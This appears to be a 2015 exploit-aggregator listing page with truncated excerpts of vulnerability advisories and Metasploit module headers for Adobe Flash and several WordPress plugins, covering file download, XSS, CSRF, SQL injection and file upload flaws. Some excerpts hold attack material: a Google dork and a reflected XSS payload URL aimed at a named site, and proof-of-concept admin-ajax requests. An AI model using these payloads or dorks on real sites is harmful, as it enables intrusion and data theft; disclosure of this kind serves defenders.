Adobe Flash Player Drawing Fill Shader Memory Corruption

28 June 2015 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
      'Description'         => %q{
        This module exploits a memory corruption happening when applying a Shader as a drawing fill
        as exploited in the wild in June 2015. This module has been tested successfully on:
 
        Windows 7 SP1 (32-bit), IE11 and Adobe Flash...

WordPress WP-Instance-Rename 1.0 File Download

28 June 2015 - Source: http://www.mondounix.com
Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.
Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is within the intended download directory:
 
try{
  $dbname   = $_GET["dbname"];
  $dumpfname...

WordPress Nextend Twitter Connect 1.5.1 Cross Site Scripting

28 June 2015 - Source: http://www.mondounix.com
Wordpress “Nextend Twitter Connect”
===================================
Document Title:
===============
WordPress “Nextend Twitter Connect” Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)
 
Download URL:
=============
https://wordpress.org/plugins/nextend-twitter-connect/
 
Release Date:
=============
2015-06-20
 
Vulnerability CVE ID:
=====================
CVE-2015-4557
 
Vulnerability Disclosure Timeline:
==================================
2015-06-15 First notified to WordPress.
2015-06-15 First notified to plugin vendor.
2015-06-15 First notified to Mitre for CVE number.
2015-06-16 Vendor publish update...

WordPress Front-end Editor File Upload

24 June 2015 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Wordpress Front-end Editor File Upload',
      'Description'    => %q{
          The Wordpress Front-end Editor plugin contains an authenticated file upload
          vulnerability. We can upload arbitrary files to the upload folder, because
          the plugin also uses its own file upload mechanism instead of the...

WordPress Revslider 4.2.2 XSS / Information Disclosure

24 June 2015 - Source: http://www.mondounix.com
| # Title    : WordPress Revslider 4.2.2 Multi Vulnerability
| # Author   : indoushka
| # email    : indoushka4ever@gmail.com
| # Dork     : inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : http://revolution.themepunch.com/
=======================================
 
XSS :
 
http://www.codekom.com//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka..Give%20me%20your%20wp-config.php
 
information...

WordPress Google Analyticator 6.4.9.3 CSRF

24 June 2015 - Source: http://www.mondounix.com
# Title: Cross-Site Request Forgery in Google Analyticator Wordpress Plugin v6.4.9.3 before rev @1183563
# Submitter: Nitin Venkatesh
# Product: Google Analyticator Wordpress Plugin
# Product URL: https://wordpress.org/plugins/google-analyticator/
# Vulnerability Type: Cross-Site Request Forgery [CWE-352]
# Affected Versions: v6.4.9.3 before rev @1183563 and possibly earlier
# Tested versions: v6.4.9.3 rev @1168849
# Fixed Version: v6.4.9.3 rev @1183563
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1183563/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
Google Analyticator makes it super easy to view Google Analytics within your WordPress dashboard. This eliminates the need to edit your...

WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection

19 June 2015 - Source: http://www.mondounix.com
# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
 
 Vulnerabilities (2)
=====================
 
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
 
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]."...

WordPress WP Photo Album Plus 6.1.2 Cross Site Scripting

19 June 2015 - Source: http://www.mondounix.com
Advisory ID: HTB23257
Product: WP Photo Album Plus WordPress Plugin
Vendor: J.N. Breetvelt
Vulnerable Version(s): 6.1.2 and probably prior
Tested Version: 6.1.2
Advisory Publication:  April 29, 2015  [without technical details]
Vendor Notification: April 29, 2015 
Vendor Patch: April 29, 2015 
Public Disclosure: May 20, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-3647
Risk Level: Medium 
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...

WordPress Encrypted Contact Form 1.0.4 CSRF / XSS

19 June 2015 - Source: http://www.mondounix.com
# Title: Cross-site Request Forgery & Cross-site Scripting in Encrypted Contact Form Wordpress Plugin v1.0.4
# Submitter: Nitin Venkatesh
# Product: Encrypted Contact Form Wordpress Plugin
# Product URL: https://wordpress.org/plugins/encrypted-contact-form/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site scripting [CWE-79]
# Affected Versions: v1.0.4 and possibly below.
# Tested versions: v1.0.4
# Fixed Version: v1.1
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1125443/
# Changelog: https://wordpress.org/plugins/encrypted-contact-form/changelog/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
Secure contact form for WordPress. Uses end-to-end encryption to...

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

19 June 2015 - Source: http://www.mondounix.com
Description
 
"media-file-manager-advanced" suffers from executing administrator actions by any authenticated user due to weak permissions checking.
An attacker can delete/update posts, create/remove/list directories, move/rename/delete files, and perform blind SQL injection and cross-site scripting.
 
Homepage
 
https://wordpress.org/plugins/media-file-manager-advanced/
 
Affected Version
 
<= 1.1.5
 
Description
 
Vulnerability Scope
 
LFD,SQL,XSS,Site Ruining and Changing of Content.
 
Authorization Required
 
User
 
Proof of Concept
 
 
Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17
 
MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER
 
folder...
